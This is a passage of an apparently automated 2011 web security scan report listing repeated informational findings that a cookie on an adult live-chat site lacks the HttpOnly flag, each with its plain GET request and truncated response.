HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:54 GMT
Connection: close
Content-Length: 23142
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.365. http://imlive.com/live-sex-chats/orgies/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/orgies/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/orgies/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:45 GMT
Connection: close
Content-Length: 48997
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.366. http://imlive.com/live-sex-chats/pornstars/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/pornstars/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/pornstars/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:17 GMT
Connection: close
Content-Length: 265777
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.367. http://imlive.com/live-sex-chats/role-play/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/role-play/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/role-play/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:46 GMT
Connection: close
Content-Length: 53291
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.368. http://imlive.com/live-sex-chats/sex-show-galleries/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-galleries/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/sex-show-galleries/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:17 GMT
Connection: close
Content-Length: 29247
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.369. http://imlive.com/live-sex-chats/sex-show-photos/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-photos/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/sex-show-photos/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:27 GMT
Connection: close
Content-Length: 25084
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.370. http://imlive.com/live-sex-chats/sex-show-sessions/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-sessions/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/sex-show-sessions/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:26 GMT
Connection: close
Content-Length: 25422
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.371. http://imlive.com/live-sex-chats/sex-video-features/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-video-features/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/sex-video-features/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:40 GMT
Connection: close
Content-Length: 31717
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.372. http://imlive.com/live-sex-chats/shemale-couple/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shemale-couple/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/shemale-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:14 GMT
Connection: close
Content-Length: 93218
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.373. http://imlive.com/live-sex-chats/shemale/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shemale/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imlv

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/shemale/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:17 GMT
Connection: close
Content-Length: 223493
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.374. http://imlive.com/live-sex-chats/shy-girl/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shy-girl/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /live-sex-chats/shy-girl/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:18:49 GMT
Connection: close
Content-Length: 167612
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...

11.375. http://imlive.com/liveexperts.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /liveexperts.asp

Issue detail

